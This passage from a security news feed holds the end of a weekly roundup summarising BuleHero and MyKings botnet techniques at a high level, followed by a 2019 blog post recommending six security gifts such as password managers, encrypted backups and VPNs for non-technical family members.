  • Lateral Movement Used by BuleHero Botnet to Spread Malware Payloads: Researchers at Zscaler observed in their analysis of BuleHero that the botnet used port scanning, Mimikatz, PsExec and WMIC to spread laterally on an affected network. These techniques enabled the threat to distribute both the XMRig miner and Gh0st RAT to a larger number of machines.
  • Various Attack Techniques Used by MyKings Botnet to Deliver Forshare: SophosLabs took a deep dive into the workings of the MyKings botnet and found that the threat used various attack techniques against vulnerable Windows servers to deliver Forshare malware. Those tactics included using steganography to conceal a malware payload within an image.

Security Tip of the Week: Focus on Data Protection

Security professionals can help organizations protect their valuable data by using artificial intelligence (AI)-driven tools and automated monitoring solutions to gain intelligent visibility into the network. They can then use that visibility to monitor for suspicious activity that could be indicative of a threat moving laterally across the network.

In support of this monitoring activity, security teams should also consider embracing a zero-trust model for the purpose of setting up micro-perimeters on the cloud and elsewhere.

The post Weekly Security News Roundup: Exposed Credit Card Details Abused Within 2 Hours appeared first on Security Intelligence.

6 Security Awareness Gifts for the Cybersecurity Unaware

18 December 2019 at 09:00

Better personal security in everyday life isn’t something everyone considers, at least not until something goes wrong. Securing home devices and personal accounts can be daunting for those who just aren’t that interested in the devices or cybersecurity. Learning the basics of personal cybersecurity is not the most appealing activity for everyone, and getting lectured by tech-savvy family members isn’t either.

Fortunately, there is a better way to teach cybersecurity. Giving the gift of better security can grant you an opportunity to discuss broader security topics in terms that specifically relate to your loved ones’ daily lives.

Here are six security awareness gifts for the person in your life who just isn’t that into security.

1. A New, More Secure Router

Home Wi-Fi security is an important part of overall personal cybersecurity that’s commonly overlooked. Default device passwords are often left unchanged after purchases, and owners aren’t always on the lookout for firmware updates. Older router models may also use outdated security protocols, so a new router can be a security awareness gift that secures the home network.

Gifting a new router may also mean spending part of your visit as a family tech support representative who reconnects devices and updates software. As painful as change might seem to your family members, a more secure home network will be worth the effort.

2. A Password Manager Subscription

Password reuse remains a gateway to multiple types of account information, especially as more personal record caches are being exposed online or sold on the dark web. Building better password habits and eliminating reuse can go a long way toward better personal security, and a password manager subscription can be a step in this direction.

As we all know, more secure passwords are but one of the many habits required to secure your digital world. Learning a new login workflow may not be for everyone, and new users may not like the change initially, but they may feel compelled to keep going if they understand how it can help them protect their accounts.

Password managers carry their own risks and security vulnerabilities, but they remain a far better tool than weak or reused passwords.

3. Encrypted File Storage/Backups

Ransomware gets a lot of press for good reason. A ransomware attack can result in total data loss when no backup exists, but secure file storage held locally or in the cloud can help eliminate much of the dread associated with data loss after a ransomware attack.

Giving the gift of an external encrypted storage device or a cloud-based encrypted backup service can grant your family members peace of mind. Knowing that important data will be secured even if your machine is overtaken by ransomware can ease worries over potential data loss.

4. Computer Monitor Privacy Filters

Privacy filters for monitors and laptop screens help protect your on-screen activity from prying eyes. They make it nearly impossible for someone to make out what’s on your screen unless they’re sitting right in front of it. Commuters and other travelers can benefit from this kind of physical barrier to their private information being displayed in public. Filters can also serve as a physical reminder to employ better personal security practices.

Privacy filters can be removed and may not protect against unauthorized access in cases where devices are stolen. If they’re used as part of an overall better approach to physical security and cybersecurity, however, they can decrease the likelihood of data loss during travel.

5. Anti-Malware and Ransomware Protection

Protecting against known malware threats and ransomware attacks is a must for personal devices. Not all family members are aware there are solutions to help prevent ransomware attacks. Coupled with an external or cloud-based encrypted backup, an anti-malware and ransomware service subscription can help protect your loved ones’ devices from attacks. Gifting several small security awareness gifts in this way can effectively build up defenses across a variety of otherwise vulnerable channels.

Bear in mind that false positive scan results and software bugs are possible when new definitions are installed, and this could be alarming to a user unfamiliar with anti-malware software. Teaching new users what to expect from their software (including potential bugs) may help to ease their minds.

6. A Virtual Private Network (VPN) Subscription

Virtual private networks (VPNs) can be a good way to encrypt your own traffic and separate it from everything else traveling over the same network. They offer significantly more privacy and security than a standard internet connection.

As I’m sure you know, some security awareness gifts may require a little extra work. Finding an appropriate VPN service that is maintained by a reputable company might be a challenge. VPNs can be very helpful, but no single tool secures a device against every possible attack. Understanding a VPN’s role in overall security habits could help new users as they learn a new network connection workflow.

Teaching Better Security Through Useful Tech Gifts

Each of these gifts could include discussion around their purpose, which may provide a better way to teach cybersecurity. They all reinforce better security through physical means or by encouraging new habits, and they offer the new user an opportunity to learn more about cybersecurity, a topic they might otherwise neglect.

The post 6 Security Awareness Gifts for the Cybersecurity Unaware appeared first on Security Intelligence.
